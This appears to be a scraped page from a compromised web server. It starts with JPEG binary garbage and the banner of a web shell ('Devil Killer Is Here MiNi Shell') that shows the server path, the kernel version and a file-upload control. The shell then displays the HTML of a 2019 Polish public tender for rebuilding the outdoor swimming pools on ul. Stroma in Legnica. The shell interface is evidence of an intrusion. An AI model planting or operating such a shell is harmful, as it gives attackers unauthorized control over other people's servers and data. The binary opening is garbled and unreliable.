JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190906/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190906/594642-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 594642-N-2019 z dnia 2019-09-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Strefa Aktywności Gospodarczej Sp.z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Wybór Wykonawcy robót budowlanych na realizację zadania pn. ,,Przebudowa zespołu basenów odkrytych przy ul. Stromej w Legnicy wraz z infrastrukturą" w formule ,,zaprojektuj i wybuduj" - przeprojektowanie (na bazie istniejącego projektu wraz z uzyskaniem wymaganych prawem decyzji, pozwoleń zamiennych oraz uzgodnień)i na tej podstawie przebudowa zespołu basenów</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Strefa Aktywności Gospodarczej Sp.z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">39028422200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">aleja Rzeczypospolitej</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">116</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">59-220</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Legnica</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-76 7226036, 721 01 38</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">biuro@sag.legnica.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-76 722 60 37</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.sag.legnica.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Spółka z o.o ze 100% udziału Gminy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.sag.legnica.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.sag.legnica.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">oferty pisemne na adres Zamawiającego - Strefa Aktywności Gospodarczej Sp. z o.o. , Aleja Rzeczypospolitej 116, 59-220 Legnica</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Strefa Aktywności Gospodarczej Sp. z o.o. , Aleja Rzeczypospolitej 116, 59-220 Legnica</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Wybór Wykonawcy robót budowlanych na realizację zadania pn. ,,Przebudowa zespołu basenów odkrytych przy ul. Stromej w Legnicy wraz z infrastrukturą" w formule ,,zaprojektuj i wybuduj" - przeprojektowanie (na bazie istniejącego projektu wraz z uzyskaniem wymaganych prawem decyzji, pozwoleń zamiennych oraz uzgodnień)i na tej podstawie przebudowa zespołu basenów</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem niniejszego zamówienia jest:wykonanie zadania polegającego na ,,Przebudowie zespołu basenów odkrytych przy ul. Stromej w Legnicy wraz z infrastrukturą" w formule ,,zaprojektuj i wybuduj" - przeprojektowanie (na bazie istniejącego projektu wraz z uzyskaniem wymaganych prawem decyzji, pozwoleń zamiennych oraz uzgodnień) i na tej podstawie przebudowę zespołu basenów1.	Zakres zadania obejmuje: a)	rozbiórkę istniejących niecek basenowych (3 szt.: niecka pływacka o wymiarach 25 x 50 m, niecka rekreacyjna o wymiarach 15 m x 25m, brodzik dla dzieci o wymiarach 10m x 15m), brodzika do stóp z natryskami oraz innych elementów kolidujących z projektowanym zagospodarowaniem terenu,b)	przeprojektowanie* i przebudowę istniejącego basenu pływackiego o wymiarze 25 x 50 m wraz z wykonaniem półki (listwy wypoczynkowej), wykonanie ścian dociskowych, wykonaniem przelewów żelbetowych, wykonanie dna niecki, foliowanie niecki folią basenową PCV-P zgrzewalną zbrojoną o grubości 1,5mm oraz skróceniem basenu - do wymiarów: 25m x 16m, głębokość: 1,30-2m, powierzchnia lustra wody: 400m2,*Przeprojektowanie polegać ma na wprowadzeniu do istniejącego projektu zmiany dot. skrócenia basenu z długości 33,3m na 16mc)	przeprojektowanie*, budowę niecki rekreacyjnej żelbetowej pokrytej folią basenową PCV-P zgrzewalną zbrojoną o grubości 1,5mm. Wymiary docelowe: 35,10 x 23,44 m, głębokość: 1,20-1,30m, powierzchnia lustra wody: 608,20m2. Z atrakcjami: grzybek wodny, parasol wodny, ruchoma armatka wodna, wodny masaż stóp, siatka do wspinaczki typ ,,Piramida", gejzer powietrzny, leżanka z masażem, ściana wodna, kabina masażowa powietrzna z wodnym masażem stóp, huśtawka wodna, masażery ścienne, rwąca rzeka.*Przeprojektowanie polegać ma na zmianie technologii wykonania niecki rekreacyjnej ze stali nierdzewnej o konstrukcji spawanej na nieckę żelbetową pokrytą folią PCV-P wraz z dostosowaniem elementów montażowych atrakcji wodnych i pozostałych urządzeń do typu przeprojektowanej niecki rekreacyjnej.d)	przeprojektowanie*, budowę brodzika dla dzieci żelbetowego pokrytego folią basenową PCV-P zgrzewalną zbrojoną o grubości 1,5mm z kolorową grafiką. Powierzchnia lustra wody: 174,60 m2, głębokość od 0,01 do 0,45m. Na granicy dwóch głębokości należy zastosować łagodne zejście bez schodów - ,,ślizg". Atrakcje wodne: gejzer powietrzny, dzwonek wodny, jeż wodny, stołek do siedzenia.*Przeprojektowanie polegać ma na zmianie technologii wykonania brodzika dla dzieci ze stali nierdzewnej o konstrukcji spawanej na brodzik żelbetowy pokryty folią wraz z dostosowaniem elementów montażowych atrakcji wodnych i pozostałych urządzeń do typu przeprojektowanej niecki brodzika. W miejscu aktualnie zaprojektowanych schodów należy zastosować rozwiązanie typu ,,ślizg" - łagodne zejście.e)	budowę wodnego placu zabaw z tryskaczami wodnymi o powierzchni 155,00 m2 i wymiarach: 11,00m x 15,00m. Nawierzchnia z tworzyw sztucznych, bezpiecznych EPDM, wielowarstwowa, wykonana in situ na podłożu betonowym. Atrakcje wodne: dysza ,,galaretka" x2, dysza ,,wulkan" x 2, dysza ,,wiaderka" x 1, dysza ,,palma" x 2, dysza ,,liść" x 2, dysza ,,drzewko" x 1, dysza ,,kwiat stokrotka" x 1, armatka obrotowa x 4, tunel z kręgów x 1 kpl., dysza ,,parasol" x 1, dysza ,,tunel" x 1 kpl., dysza ,,pączek" x 2. Budowa wodnego placu zabaw w oparciu o istniejący projekt.f)	Budowa i montaż 3 zjeżdżalni wodnych z wannami hamownymi wraz z instalacjami zasilającymi w wodę. Typy zjeżdżalni: Zjeżdżalnia Pontonowa wraz z niezbędnym wyposażeniem, Zjeżdżalnia trójtorowa Multislide, Zjeżdżalnia Kamikaze. Budowa zjeżdżalni zlokalizowanych w górnej części przebudowywanej i skracanej niecki pływackiej w oparciu o istniejący projekt.UWAGA: w istniejącym projekcie uwzględniono 4 zjeżdżalnie. Z realizacji wyłącza się zjeżdżalnię typu Cebula z dolotem.g)	przeprojektowanie*, przebudowę i rozbudowę istniejących budynków wraz z dostosowaniem do korzystania z obiektu przez osoby niepełnosprawne.- budynek technologii wody - oznaczony symbolem ,,A" (rozbudowa w oparciu o istniejący projekt),- budynek istniejący - oznaczony symbolem ,,B1" (w oparciu o istniejący projekt z przeprojektowaniem*) Przeprojektowanie* polegać ma na zmianie funkcji pomieszczeń i dostosowaniu instalacji wewnętrznych do tej zmiany. Pomieszczenie ratowników, pomieszczenie pierwszej pomocy, WC i pomieszczenia magazynów oznaczone symbolami B1 0/1 - 0/7 mają zostać dostosowane do funkcji komercyjnej, tj. pomieszczeń do wynajęcia na różnego typu usługi SPA, do części przeznaczonej na wynajem należy doprojektować dodatkowe WC,- budynek z kasami i zapleczem sanitarnym - oznaczony symbolem ,,D"(przebudowa w oparciu o istniejący projekt z przeprojektowaniem*). Rozbiórka istniejącego, parterowego budynku higieniczno-sanitarnego z dachem płaskim. W miejsce wyburzonego budynku - budowa budynku kas wraz z zapleczem higieniczno-sanitarnym. Przeprojektowanie* polegać ma na likwidacji jednego stanowiska kasowego i zaaranżowaniu w jego miejsce stanowiska Kierownika Basenu,- budynek istniejący - oznaczony symbolem ,,D1"(przebudowa w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na przebudowaniu, zmianie funkcji pomieszczeń i dostosowaniu instalacji wewnętrznych do tej zmiany. Pomieszczenia oznaczone symbolami D1 0/4 - 0/5 mają zostać przebudowane w taki sposób, aby mogły pełnić funkcje pomieszczenia dla ratowników i punktu medycznego o pow. ok. 10 m2 dla D1 0/4 i pow. 11,6 m2 dla D1 0/5. Ponadto pomieszczenie dla ratowników ma być przeszklone dużym oknem typu ,,wystawowe". Pomieszczenia oznaczone symbolami D1 0/1-0/2 w oparciu o istniejący projekt z przeznaczeniem na pomieszczenia socjalne dla personelu i pracowników obsługi technicznej. Pomieszczenie oznaczone symbolem D1 0/7 ma zostać dostosowane do potrzeb ochrony fizycznej obiektu. Pomieszczenie oznaczone symbolem D1 0/8 ma zostać dostosowane do funkcji szatniowej - należy zainstalować w tym pomieszczeniu 30 szt. trójdzielnych szafek ubraniowych (tj. dla 90-ciu użytkowników)wykonanych z płyty HPL z zamkami na szyfr. Przybliżona objętość pojedynczego schowka ubraniowego nie może być mniejsza niż 150 cm3. Część tarasowa, otwarta budynku ma zostać wyposażona w leżaki drewniane - 20 szt. Zadaszenie otwartej części tarasowej budynku ma zostać poszerzone o lekką zabudowę typu ,,pergola".h)	budowę nowego, parterowego, podpiwniczonego budynku technologii wody wraz z zapleczem sanitarno-szatniowym - oznaczony symbolem ,,C" (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na zmianie funkcji pomieszczenia oznaczonego symbolem C 0/1 z magazynu na pomieszczenie szatniowe. W pomieszczeniu tym należy zainstalować 35 szt. trójdzielnych szafek ubraniowych (tj. dla 90-ciu użytkowników) wykonanych z płyty HPL z zamkami na szyfr. Przybliżona objętość pojedynczego schowka ubraniowego nie może być mniejsza niż 150 cm3. Pozostały zakres prac w oparciu o istniejący projekt.i)	technologię wody basenowej (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na: dostosowaniu urządzeń do zmiany technologii wykonania niecki rekreacyjnej i brodzika ze stali nierdzewnej na niecki żelbetowe pokryte folią,j)	system podgrzewania wody basenowej i użytkowej na potrzeby sanitariatów (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na dostosowaniu wydajności systemu do wprowadzonej zmiany związanej z przebudową i skróceniem niecki pływackiej z uwzględnieniem mocy i wydajności na etapie eksploatacji, k)	wykonanie nowych nawierzchni plaży basenowej z kostki ceramicznej (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na zmianie lokalizacji miejsca przeznaczonego dla przenośnej gastronomii i uwzględnienie zmian dot. rezygnacji z instalacji zjeżdżalni wodnej typu Cebula z dolotem i skróceniem niecki pływackiej,l)	budowę brodzików przejściowych (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na dostosowaniu lokalizacji brodzików przejściowych do przebudowywanej i skracanej niecki pływackiej.m)	budowę zbiorników wyrównawczych (w oparciu o istniejący projekt z przeprojektowaniem*). Przeprojektowanie* polegać ma na dostosowaniu lokalizacji zbiorników wyrównawczych do przebudowywanej i skracanej niecki pływackiej,n)	budowę dojść i dojazdów z kostki betonowej wraz z trzema miejscami postojowymi dla osób niepełnosprawnych oraz placu dla pojazdów gastronomicznych (przeprojektowanie*). Przeprojektowanie* polegać ma na zmianie lokalizacji placu dla pojazdów gastronomicznych,o)	budowę infrastruktury technicznej niezbędnej do użytkowania obiektu (w oparciu o istniejący projekt wraz z przeprojektowaniem*): - wewnętrzne instalacje sanitarne: instalacja wody zimnej, ciepłej i cyrkulacji wraz z instalacją kanalizacji, instalacja solarna, ogrzewanie, instalacja gazu, wentylacja mechaniczna wywiewna. UWAGA: zmiana funkcji pomieszczeń i wyłączenie z realizacji Budynku Gastronomii- zewnętrzne instalacje sanitarne:kanalizacja sanitarna + przyłącze, instalacja wodociągowa, instalacja deszczowa, ogrzewanie wody basenowej, instalacja gazowa, klimatyzacja w serwerowni. UWAGA: zmiana funkcji pomieszczeń i wyłączenie z realizacji Budynku Gastronomii- elektryczna instalacja zewnętrzna i wewnętrzna:zasilanie, rozdzielnica główna RG 0,4 kV, rozdzielnice obiektowe, zasilanie urządzeń technologicznych obiektu, tj. technologii wody basenowej, systemu grzewczego, ogrzewania elektrycznego, oświetlenia zewnętrznego, serwerowni, przepompowni ścieków, wentylacji i klimatyzacji pomieszczeń, instalacji teletechnicznych,instalacje elektryczne, instalacje oświetleniowe, oświetlenie awaryjne, instalacja odgromowa, oświetlenie terenu (montaż 15 szt. słupów z oprawami led, przeprojektowanie* do ustalenia z Zamawiającym zmiany lokalizacji słupów w stosunku do istniejącego projektu), ochrona przeciwporażeniowa, ochrona przeciwpożarowa, ochrona przed przepięciami - wykonanie trafostacji, - instalacji teletechnicznej: infrastruktury kablowej, systemu wykrywania i sygnalizacji pożaru, systemu nagłośnienia, systemu wykrywania i sygnalizacji włamania, systemu telewizji przemysłowej, okablowania strukturalnego, systemu kontroli dostępu, systemu rozliczania usług; - wykonanie instalacji LEG-MAN. Należy wykonać odejście do obiektu na odcinku od studni SK.LCANB11(SK.S0012) w układzie 2x40 HDPE. Kabel światłowodowy jednomodowy 12J należy doprowadzić kanalizacją sieci LEGMAN do najbliższego punktu agregacyjnego to jest do skrzyżowania z ul Jaworzyńską (szafka SK42). Wytyczne do projektowania dostępne są na stronie www.legman.pl w zakładce dla projektantów (w istniejącym projekcie instalacja LEG-MAN nie została uwzględniona)Przeprojektowanie* infrastruktury technicznej niezbędnej do użytkowania obiektu polegać ma na dostosowaniu do pozostałych zmian naniesionych do istniejącego projektu,p)	wykonanie ogrodzeń: - ogrodzenie panelowe terenu H=2,40 m - 548,5m (w oparciu o 